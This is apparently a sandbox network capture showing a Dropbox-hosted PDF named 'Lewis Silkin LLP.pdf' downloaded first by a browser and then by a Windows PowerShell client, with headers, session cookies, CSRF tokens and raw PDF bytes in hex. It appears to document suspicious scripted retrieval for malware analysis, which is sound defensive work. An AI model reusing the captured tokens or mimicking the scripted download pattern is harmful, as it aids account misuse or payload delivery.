2024-12-17 11:13:37 UTC	4094	IN	HTTP/1.1 302 Found Content-Security-Policy: script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; font-src https:// data: ; base-uri 'self' ; frame-ancestors 'self' https://*.dropbox.com ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/s [TRUNCATED] Content-Type: text/html; charset=utf-8 Location: https://uc5c65c43ad4aba7cc9431e0b8f6.dl.dropboxusercontent.com/cd/0/get/CgZNsgbW6ffgpNuZxFw6lsljZsQkq1b2l3dXRUrmiUV6ZejyVueUgRgRJzXBTN9CAq0rnzwPuSuA--sgXpeTNeNnINmYrLJMJ3K26Y2QXEpBkmsYLv1m_hSzwrTcGrcp7O6a6dDEh_Pg2Sx5P4-DEN86/file?dl=1# Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=MzI4MDExMjY5OTA2NjE0OTAyMDg2MTI2Mzg4OTgzNTQ5NzYzNjEw; Path=/; Expires=Sun, 16 Dec 2029 11:13:36 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=ke3643gZQct7hgCfDYYGb0OW; Path=/; Domain=dropbox.com; Expires=Wed, 17 Dec 2025 11:13:36 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=ke3643gZQct7hgCfDYYGb0OW; Path=/; Expires=Wed, 17 Dec 2025 11:13:36 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=3gx7OYGHwg; Path=/; Expires=Wed, 17 Dec 2025 11:13:36 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en_GB; Path=/; Domain=dropbox.com; Expires=Sun, 16 Dec 2029 11:13:36 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Content-Length: 17 Date: Tue, 17 Dec 2024 11:13:36 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 7be703b5f2784c8ba52b0185d4ab2ba2 Connection: close
2024-12-17 11:13:37 UTC	17	IN	Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e Data Ascii: ...status=302-->

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:13:38 UTC	888	OUT	GET /cd/0/get/CgZNsgbW6ffgpNuZxFw6lsljZsQkq1b2l3dXRUrmiUV6ZejyVueUgRgRJzXBTN9CAq0rnzwPuSuA--sgXpeTNeNnINmYrLJMJ3K26Y2QXEpBkmsYLv1m_hSzwrTcGrcp7O6a6dDEh_Pg2Sx5P4-DEN86/file?dl=1 HTTP/1.1 Host: uc5c65c43ad4aba7cc9431e0b8f6.dl.dropboxusercontent.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-17 11:13:39 UTC	668	IN	HTTP/1.1 200 OK Content-Type: application/binary Accept-Ranges: bytes Cache-Control: max-age=60 Content-Disposition: attachment; filename="Lewis Silkin LLP.pdf"; filename*=UTF-8''Lewis%20Silkin%20LLP.pdf Etag: 1733686441286063d Pragma: public Referrer-Policy: no-referrer Vary: Origin X-Content-Type-Options: nosniff X-Robots-Tag: noindex, nofollow, noimageindex X-Server-Response-Time: 156 Date: Tue, 17 Dec 2024 11:13:39 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 106848 X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: ecabb257e85c451fa3b642dae7631547 Connection: close
2024-12-17 11:13:39 UTC	16384	IN	Data Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 32 35 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 38 35 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 38 36 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 32 30 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20 Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>endobj3 0 obj<</Type/Page/Parent
2024-12-17 11:13:39 UTC	16384	IN	Data Raw: 5f 8a 3c 27 e3 2b db 25 d4 a5 b8 82 29 fe 58 ee 5b 78 64 3c 81 93 c8 e0 8e 45 7b 7e 99 7d 1e a7 a5 da de c5 c2 4f 12 c8 06 73 8c 8c e2 95 3a aa 6d ae a8 ac 5e 02 a6 1a 31 9b 69 c6 5b 34 73 7e 3f f1 74 be 14 d1 a3 9a da 14 92 ea 79 3c b8 c3 9e 17 8c 92 47 53 53 e8 f1 ae bd e1 98 6e e2 d6 6e de 7b 88 79 b9 8a 40 bb 18 8e 40 40 36 8c 1f 6c d5 6f 1f 78 2c 78 b7 4d 8c 43 28 8a f6 d8 93 0b 37 dd 39 ea a7 f2 1c d7 8f e9 da 97 89 3e 1d ea ed 03 a3 c0 58 e5 ed e5 c9 8e 51 d3 23 1c 7e 22 b2 a9 52 50 9d e4 bd d3 bf 07 83 a5 8a c2 a5 46 49 55 4e f6 7d 7f af f8 73 d4 fe 1f 5b df 68 b7 7a cf 87 b5 29 0c b3 41 28 b9 8e 66 ff 00 96 c8 fc 6e e7 dd 79 f7 35 e4 da cd bc de 1e f1 5d f4 31 ca ea 6d ae f7 c6 1b a7 5d c9 fa 1e b5 ec 5e 15 f1 a6 8b e2 8b 94 90 20 b6 d5 96 33 19 Data Ascii: _<'+%)X[xd<E{~}Os:m^1i[4s~?ty<GSSnn{y@@@6lox,xMC(79>XQ#~"RPFIUN}s[hz)A(fny5]1m]^ 3
2024-12-17 11:13:39 UTC	16384	IN	Data Raw: 51 18 94 6c 67 a6 be 6f af d1 66 af 6e e5 a2 55 46 bd de e4 4a ec 37 bc b8 7a 54 d9 a2 cd bd 7b 72 32 37 d7 24 99 8d fd 8c c5 23 86 57 b5 d5 2f ea 92 e3 73 2b f6 d0 16 bc 11 4c 34 56 f3 bb 3f 96 83 49 78 8d de e2 42 a3 b7 a4 b0 de c8 76 18 f7 19 b9 71 43 ac dc 13 2c a7 57 61 d1 48 df b0 6b 07 49 a7 b9 22 43 74 e1 5e 47 79 5e 6d 8b 7b 52 a3 c3 f2 bc 72 57 9b 14 7e 5f 3c a6 2e 26 0b 65 d1 ef 64 4b c1 06 83 3d c4 74 41 55 4d 96 cc 6c ce 08 b1 78 6f a2 31 83 b2 bd d9 dc 9b ed cf de 99 7d 3c 5b c9 4e 90 e2 b8 7a bc fc d6 d3 66 bc d4 54 4a 77 1d 64 03 19 de 11 91 58 61 51 cf 5f 75 7a ca c9 be e9 5b 7e a5 77 32 cb 72 66 65 66 71 1d 67 82 71 9d de d5 df 3a c0 3a d0 2a 74 49 d9 f1 2e 53 76 5a 7a 6a 3a d7 39 94 84 46 b2 e9 32 1a 59 bf 38 a4 52 62 91 ca 62 f6 46 66 Data Ascii: QlgofnUFJ7zT{r27$#W/s+L4V?IxBvqC,WaHkI"Ct^Gy^m{RrW~_<.&edK=tAUMlxo1}<[NzfTJwdXaQ_uz[~w2rfefqgq::*tI.SvZzj:9F2Y8RbbFf
2024-12-17 11:13:40 UTC	16384	IN	Data Raw: f7 8f f9 69 ff f7 e9 5f 52 2c 56 ca d5 54 17 fe c8 c2 72 fe b5 68 6d 6b ab 7d f5 0f 98 02 f6 af 11 5c 56 a9 d5 4c 41 8f ca 05 b4 ab 70 a0 70 b0 c0 14 7c e0 cf 0b 12 a8 52 a1 5c cd 31 63 03 68 00 ae cd 8a b5 1c 37 7e 32 21 bb 49 e3 77 84 b7 1a 00 92 c5 62 c5 0a 38 a0 46 d3 28 4d 64 b7 29 50 3a 90 46 6b d2 c3 e9 c9 f4 c9 b4 29 6d 83 3d d3 f3 bc 32 6e fc bb ee 04 43 93 be 41 d9 5a d8 aa 6f 3d 84 ef b9 79 2b 1c 1a 12 a5 d2 56 db 81 fb 97 a1 65 84 f1 5a 56 54 bc c8 ee 1d f6 fe 1c 3b 97 fa dc 7f e8 0e 92 e3 22 01 10 f1 92 df e8 ad d3 df d7 5d 0f d6 50 ad 58 60 fa 19 ba 9f 41 14 23 c3 82 74 f8 56 fa c3 25 52 e3 b3 32 f0 f5 00 df a1 f1 14 5c 23 73 f5 96 ad cf a0 1b a9 18 b2 1c d9 0f c3 43 c6 e4 a2 d1 e9 d1 19 d2 98 d6 46 4f cb da c8 fb 64 43 33 26 0e 8f c8 a7 31 Data Ascii: i_R,VTrhmk}\VLApp\|R\1ch7~2!Iwb8F(Md)P:Fk)m=2nCAZo=y+VeZVT;"]PX`A#tV%R2\#sCFOdC3&1
2024-12-17 11:13:40 UTC	16384	IN	Data Raw: c9 db 1a b7 3d bb 7f eb c9 dd fd 11 6b ac c0 44 63 29 8f d3 56 1b 1a ae 89 63 0f 9e 3d 78 f3 0f 4f 4d 85 ac 94 49 8f 6b ac 41 1f 92 52 2f 94 d2 4d 10 5b 7e ac 88 ed 68 72 27 d2 a0 96 06 d5 d4 23 29 bc 16 05 0f 19 c1 08 09 86 09 30 84 03 2d a2 4b c0 96 08 26 1e 4b 3c 9d d0 24 12 ae b2 9f 2e 8a 2e 5e 90 68 de 4a 15 65 c9 c7 63 cb 41 06 e4 f9 f7 d5 71 83 33 f3 4b 19 8a 85 b0 01 e1 68 79 d8 0f 54 2a 68 da 20 82 d5 b8 e3 f1 f7 1e 1b b6 25 46 ca bd 77 1c bd b3 a1 6c 49 75 05 4c 36 a1 1c 01 35 4a 4c ca 6e df f4 cc 96 95 f2 c0 ad 4f 6f b1 c6 62 12 45 5c 58 75 ff 37 67 22 3b f6 ed 4e 40 d1 d6 88 96 60 21 82 1f 4d 77 05 8d c2 a5 9b 08 bd 96 b0 46 1a db 1e dc b0 ef 99 23 75 40 10 00 a2 a2 04 65 6a 2f 6c 77 11 bb a1 59 8e 48 a2 d5 6a a7 69 11 ad 7c 12 14 81 28 a6 cb Data Ascii: =kDc)Vc=xOMIkAR/M[~hr'#)0-K&K<$..^hJecAq3KhyT*h %FwlIuL65JLnOobE\Xu7g";N@`!MwF#u@ej/lwYHji\|(
2024-12-17 11:13:40 UTC	16384	IN	Data Raw: 27 cb 47 8c 2b bd b6 b1 c2 c6 78 e6 d3 8c 29 7d 26 4e 2d e8 77 c3 63 75 f7 23 ef 3c d4 aa a9 5b 54 db dc fc 4a 9a 91 b1 a6 32 c6 d4 cc ba 95 2d de dd cd 6f 0e 60 ec e6 cd 8c e9 1f 9a d7 3c 7f d1 fa 77 d5 41 8c 2d a9 67 cc 16 98 df 74 fa bc d7 ca 77 14 32 b6 6d 14 63 f6 0f 1a 1b 6a eb 3b 0f df f3 1a da b3 a2 bd 81 8d 70 d8 ee 49 3f 88 34 da 63 59 8d 8b 5a 56 0f 1b 63 3c 84 f4 47 8c 2d 9c d9 b4 a4 ae b6 ed c8 a6 53 18 db d5 9b b1 41 86 45 b5 ab 9b f3 17 65 ff 09 f9 8d 28 ef 5d d4 d0 52 7b ed d9 5b 57 32 de 7d 2f d2 e7 2c ae 5d d4 e0 8a bf 70 05 63 9f e1 99 7d 5a 9a 97 2c 6f e9 72 b3 8d 18 cf 9d a2 7c f3 b2 86 e6 db 7f 58 f0 08 63 6b 2f c6 e3 be 67 62 2e 0c 23 2e 5a 18 77 f5 b7 73 ec 43 bf 66 a9 26 26 ec c1 4f d6 3e 27 f8 9d ef 6e 7d f2 87 43 47 5a e3 3e 35 Data Ascii: 'G+x)}&N-wcu#<[TJ2-o`<wA-gtw2mcj;pI?4cYZVc<G-SAEe(]R{[W2}/,]pc}Z,or\|Xck/gb.#.ZwsCf&&O>'n}CGZ>5
2024-12-17 11:13:40 UTC	8544	IN	Data Raw: 1d 4b 08 48 1c 19 42 6c 58 e3 d4 c8 32 a0 b4 fc cb 65 7b 3a 6f eb eb 54 26 bf d8 7a eb 67 67 eb 34 2d 5b e9 5b 35 62 d4 8d 76 e5 bd a2 12 5a f7 fd ce 67 e4 cf 6f 3b 6f 38 32 89 27 5c b4 6a e6 2f 61 da 81 7d 3c 9e 76 d9 ea d5 e2 cd e0 fc 4b d1 1b 84 e1 75 ee 26 8c 9f a0 71 1e b3 fe cc 45 e5 5a e1 05 c1 98 b0 77 b7 d3 56 ae 39 b7 78 a2 f5 51 ff e3 d7 fc 44 1d 16 0e b2 4f 7c b3 f3 85 de f9 4b f1 b9 21 5d 0f 2e 90 5d 59 39 e4 a8 5b 16 e7 89 a7 62 77 95 6d d9 88 3e 5b 4f da 46 ba f6 9b 32 ee 6a b6 57 72 ee b1 79 0d 1b f4 ef f7 8d ac cc e1 d9 77 69 97 0e ec 55 e7 df bc b8 2d db e3 f9 e2 62 a7 c7 64 b1 d3 23 a3 79 f9 7c ae b8 d8 e9 1a b4 5d ae 71 36 75 3a 06 4d 87 79 5c fe 87 67 d3 62 6e aa a5 8d c1 9d 8e 70 3c 2d e6 86 83 6d bb 42 47 47 88 67 96 f4 a8 0c 6b 3e Data Ascii: KHBlX2e{:oT&zgg4-[[5bvZgo;o82'\j/a}<vKu&qEZwV9xQDO\|K!].]Y9[bwm>[OF2jWrywiU-bd#y\|]q6u:My\gbnp<-mBGGgk>

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:13:40 UTC	246	OUT	GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.dropbox.com Connection: Keep-Alive
2024-12-17 11:13:41 UTC	4091	IN	HTTP/1.1 302 Found Content-Security-Policy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; style-src https:// 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.l [TRUNCATED] Content-Type: text/html; charset=utf-8 Location: https://ucba4b1078bde293defc150c5894.dl.dropboxusercontent.com/cd/0/get/CgZSpmkgglMHW_xaaU7yqi82x2q8KwWyqvhs2o8ESVwD1ny7JJxD0tMY9BrM0z0sqHg6HP3PasiERBoNA2jjZX3zJgMydw3s0GEWJ8eHDZ7bmxtwZuwAHu2TbWyzA-06cb8fnjg4dg4184uHnGSAFbpz/file?dl=1# Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=Mjk4ODgxNTI4Njc1MjEzMjQ0Njg4OTE2MDc5NjA3NjIyNDY1MDc1; Path=/; Expires=Sun, 16 Dec 2029 11:13:41 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=hAg6TrDGMa8DwZrLKZgdBlaA; Path=/; Domain=dropbox.com; Expires=Wed, 17 Dec 2025 11:13:41 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=hAg6TrDGMa8DwZrLKZgdBlaA; Path=/; Expires=Wed, 17 Dec 2025 11:13:41 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=F6hvQjfhLc; Path=/; Expires=Wed, 17 Dec 2025 11:13:41 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 16 Dec 2029 11:13:41 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Content-Length: 17 Date: Tue, 17 Dec 2024 11:13:41 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 0af7262b42c6452a98c420683e048cca Connection: close
2024-12-17 11:13:41 UTC	17	IN	Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e Data Ascii: ...status=302-->

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:13:41 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-17 11:13:41 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-17 11:13:41 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Tue, 17 Dec 2024 11:13:41 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f367c3a589e4344-EWR alt-svc: h3=":443"; ma=86400
2024-12-17 11:13:41 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 81 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomA)

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:13:42 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-17 11:13:42 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-17 11:13:42 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Tue, 17 Dec 2024 11:13:42 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f367c40fa1c0ca4-EWR alt-svc: h3=":443"; ma=86400
2024-12-17 11:13:42 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 23 00 04 8e fb 28 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom#(c)

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:13:43 UTC	370	OUT	GET /cd/0/get/CgZSpmkgglMHW_xaaU7yqi82x2q8KwWyqvhs2o8ESVwD1ny7JJxD0tMY9BrM0z0sqHg6HP3PasiERBoNA2jjZX3zJgMydw3s0GEWJ8eHDZ7bmxtwZuwAHu2TbWyzA-06cb8fnjg4dg4184uHnGSAFbpz/file?dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ucba4b1078bde293defc150c5894.dl.dropboxusercontent.com Connection: Keep-Alive
2024-12-17 11:13:44 UTC	761	IN	HTTP/1.1 200 OK Content-Type: application/binary Accept-Ranges: bytes Cache-Control: max-age=60 Content-Disposition: attachment; filename="Lewis Silkin LLP.pdf"; filename*=UTF-8''Lewis%20Silkin%20LLP.pdf Content-Security-Policy: sandbox Etag: 1733686441286063d Pragma: public Referrer-Policy: no-referrer Vary: Origin X-Content-Security-Policy: sandbox X-Content-Type-Options: nosniff X-Robots-Tag: noindex, nofollow, noimageindex X-Server-Response-Time: 131 X-Webkit-Csp: sandbox Date: Tue, 17 Dec 2024 11:13:43 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 106848 X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 2a02ab7ed1f04fa9b6744e13425b28f1 Connection: close
2024-12-17 11:13:44 UTC	15623	IN	Data Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 32 35 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 38 35 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 38 36 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 32 30 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20 Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>endobj3 0 obj<</Type/Page/Parent
2024-12-17 11:13:44 UTC	16384	IN	Data Raw: 6f b3 05 3c fc 9b b7 28 fc 39 03 da b8 cf 07 d8 da eb fe 02 d3 6f 21 b6 84 6a 9a 74 98 8e 55 01 58 bc 6d 90 09 f4 65 c0 39 f5 ae a6 c3 52 46 f1 be a9 a6 8d bc 5b c3 31 1b b9 dd c8 3c 67 d3 6f 6a d6 12 bd 9b ea 79 98 8a 5e cd ca 9c 2f ee dd 3f 93 df f1 3c f7 e3 3e 96 23 d4 2c 35 45 18 32 c4 60 66 ce 30 54 e4 7e 84 fe 55 d0 7c 1f d4 fe d7 e1 27 b3 63 96 b3 9d 95 46 7f 85 be 61 fa 96 ad 4f 89 9a 48 d5 bc 1d 38 05 44 90 3a ca ac c7 00 73 82 49 f4 c1 27 f0 ae 3f e1 8d 9d f6 87 ae 5f a9 86 69 74 f9 63 da 24 44 24 31 07 28 c3 d8 a9 3c d6 56 71 af 7e 8c f4 95 48 57 ca 7d 9b 7e f4 1e 9f d7 a3 3d 83 b5 79 07 c5 7b 59 34 bf 13 68 de 23 81 4e 63 c0 72 3d 51 83 0f cc 13 f9 57 af a9 dc a0 e0 8c 8e 86 b8 af 8a 5a 57 f6 8f 82 ae 24 45 06 5b 47 59 d7 3e 83 83 fa 12 7f 0a Data Ascii: o<(9o!jtUXme9RF[1<gojy^/?<>#,5E2`f0T~U\|'cFaOH8D:sI'?_itc$D$1(<Vq~HW}~=y{Y4h#Ncr=QWZW$E[GY>
2024-12-17 11:13:44 UTC	761	IN	Data Raw: cd 31 4a 9c ec 77 4a 46 46 6a 42 cc 0a e5 e7 a9 2b 28 81 25 6c b0 f6 df ea 58 7a 55 9a db 7d 7a fe d9 d3 91 10 f4 c5 e1 ac a7 44 0e 97 9b ad 9a df f7 a5 f4 6a eb a3 14 e7 d5 f7 93 51 18 91 f1 42 81 8c 81 18 74 41 0c 1c 17 06 84 7b 47 a5 f0 d1 c3 dc 63 92 c6 f4 36 16 a5 14 e6 e6 14 67 8c 12 4e 96 75 65 7a 7a 49 71 f1 f0 59 4d bd bf 63 83 af ca f1 16 8f 1d 3e e8 96 de d7 e5 4d 7f 3a f4 19 da 18 37 c9 58 78 ad 31 71 1d 03 17 8d 32 c9 ae c6 ca ae 86 4c cf 98 5e 33 bd 6f 52 62 65 2f 1f d3 89 b8 d4 d4 0c a3 ec a2 37 26 36 d6 b8 42 74 98 6b ef 97 73 ef 24 fa 30 d5 52 d9 5c f1 1e 95 4c 91 fd 60 ab d1 05 6b 37 79 75 d2 fd 8c 17 e0 7c d2 85 ee 6e 1f 95 3a 32 37 77 ac e6 e2 e0 ef b8 e1 55 be eb d6 88 57 b5 bd 93 f8 3a f5 16 4a a2 6a cd 2b e7 b6 84 07 13 f8 f7 62 6f Data Ascii: 1JwJFFjB+(%lXzU}zDjQBtA{Gc6gNuezzIqYMc>M:7Xx1q2L^3oRbe/7&6Btks$0R\L`k7yu\|n:27wUW:Jj+bo
